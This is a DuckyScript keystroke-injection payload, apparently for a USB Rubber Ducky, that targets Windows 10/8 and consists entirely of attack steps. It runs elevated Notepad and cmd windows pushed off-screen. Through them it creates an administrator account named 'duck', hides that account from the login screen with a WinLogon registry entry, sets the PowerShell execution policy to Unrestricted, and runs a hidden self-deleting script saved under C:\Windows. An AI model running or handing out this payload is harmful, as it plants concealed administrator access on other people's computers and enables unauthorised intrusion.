REM	=============================================================================================================
REM 	Title: Create User Admin
REM 	Author: Mr.Cricket
REM 	Description: xxx
REM 	Target: Windows 10/8
REM 	Category: Execution
REM	  You can change the Username and Password  in line 28
REM	==============================================================================================================



DELAY 750  
GUI r 
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750  
ALT y 
DELAY 750  
ENTER
ALT SPACE 
DELAY 1000
STRING m 
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Net User duck password  /ADD 
ENTER
STRING Net LocalGroup Administrators duck  /ADD  
ENTER 
DELAY 500
STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v duck /t REG_DWORD /d 0 /f
ENTER

STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-91412.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 750  
GUI r 
DELAY 750  
STRING powershell Start-Process cmd -Verb runAs 
ENTER
DELAY 750  
ALT y 
DELAY 1000
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 750  
STRING m 
DELAY 750   
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-91412.ps1
ENTER
